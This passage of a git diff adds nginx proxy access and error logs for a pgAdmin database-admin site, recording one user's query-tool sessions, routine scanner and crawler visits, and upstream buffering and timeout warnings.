Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:42 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:43 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:44 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:46 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 341] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 308] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:46 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:27:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:27:56 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:27:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:27:56 +0000] - 200 200 - DELETE https db.profibot.hu "/sqleditor/close/3857941" [Client 84.1.26.27] [Length 74] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[30/Jan/2026:01:50:12 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 74.7.175.158] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:12:12:59 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 167.94.146.61] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:12:13:01 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 167.94.146.61] [Length 2388] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:12:13:02 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 167.94.146.61] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:12:13:02 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 167.94.146.61] [Length 78998] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico?ver=91100" +[30/Jan/2026:12:13:02 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 167.94.146.61] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:12:13:03 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 167.94.146.61] [Length 78998] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico" +[30/Jan/2026:14:51:23 +0000] - - 301 - GET http db.profibot.hu "/" [Client 199.45.155.84] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:15:52:00 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 34.32.247.234] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[30/Jan/2026:15:52:00 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 34.32.247.234] [Length 2422] [Gzip -] [Sent-to pgadmin_ui] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[31/Jan/2026:04:46:40 +0000] - - 301 - GET http db.profibot.hu "/" [Client 147.182.186.86] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:04:46:40 +0000] - - 301 - GET http db.profibot.hu "/favicon.ico" [Client 147.182.186.86] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://db.profibot.hu/" +[31/Jan/2026:04:46:41 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 147.182.186.86] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:04:46:44 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 147.182.186.86] [Length 2424] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:04:46:44 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 147.182.186.86] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[31/Jan/2026:08:46:53 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 204.76.203.25] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:08:46:53 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 204.76.203.25] [Length 6219] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:10:07:03 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.43.179] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:03 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.43.179] [Length 2494] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:04 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.43.179] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[31/Jan/2026:10:07:04 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.43.179] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[31/Jan/2026:10:07:04 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.43.179] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[31/Jan/2026:18:45:48 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js" [Client 204.76.203.25] [Length 667915] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:48 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js" [Client 204.76.203.25] [Length 565795] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:49 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js" [Client 204.76.203.25] [Length 6569131] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[31/Jan/2026:18:45:50 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js" [Client 204.76.203.25] [Length 2105491] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[02/Feb/2026:13:02:28 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:13:02:28 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2493] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:13:02:28 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[02/Feb/2026:13:02:28 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" diff --git a/proxy-manager/data/logs/proxy-host-1_access.log.1.gz b/proxy-manager/data/logs/proxy-host-1_access.log.1.gz new file mode 100755 index 0000000..8d9d072 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_access.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-1_access.log.2.gz b/proxy-manager/data/logs/proxy-host-1_access.log.2.gz new file mode 100755 index 0000000..9974bad Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_access.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-1_access.log.3.gz b/proxy-manager/data/logs/proxy-host-1_access.log.3.gz new file mode 100755 index 0000000..554efcf Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_access.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-1_error.log b/proxy-manager/data/logs/proxy-host-1_error.log new file mode 100755 index 0000000..17de071 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-1_error.log @@ -0,0 +1,78 @@ +2026/01/12 10:22:49 [warn] 210#210: *4399 using uninitialized "server" variable while logging request, client: 129.212.226.110, server: db.profibot.hu +2026/01/13 08:21:03 [warn] 250#250: *15837 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/70/0000006705 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.react.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/13 08:21:03 [warn] 250#250: *15836 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/70/0000006706 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/13 08:21:03 [warn] 250#250: *15835 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/70/0000006707 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/13 08:21:03 [warn] 249#249: *15828 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/70/0000006708 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/15 04:32:38 [warn] 298#298: *46171 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/84/0000020846 while reading upstream, client: 84.254.106.197, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu" +2026/01/19 21:47:08 [error] 206#206: *1500 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 37.76.9.111, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.21.0.2:80/", host: "db.profibot.hu" +2026/01/20 06:46:22 [error] 256#256: *11826 upstream prematurely closed connection while reading response header from upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.21.0.2:80/", host: "db.profibot.hu" +2026/01/20 06:46:22 [error] 256#256: *11826 upstream prematurely closed connection while reading response header from upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.21.0.2:80/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/20 06:46:59 [error] 256#256: *11831 upstream prematurely closed connection while reading response header from upstream, client: 37.76.14.66, server: db.profibot.hu, request: "GET /browser/ HTTP/1.1", upstream: "http://172.21.0.2:80/browser/", host: "db.profibot.hu" +2026/01/20 06:47:00 [error] 256#256: *11831 upstream prematurely closed connection while reading response header from upstream, client: 37.76.14.66, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.21.0.2:80/", host: "db.profibot.hu" +2026/01/20 06:47:00 [error] 256#256: *11831 upstream prematurely closed connection while reading response header from upstream, client: 37.76.14.66, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.21.0.2:80/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/20 06:55:39 [warn] 258#258: *11859 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/46/0000004467 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.react.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 06:55:39 [warn] 257#257: *11858 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/46/0000004468 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 06:55:39 [warn] 258#258: *11864 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/46/0000004469 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 06:55:39 [warn] 258#258: *11867 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/47/0000004470 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 15:27:59 [warn] 264#264: *15485 an 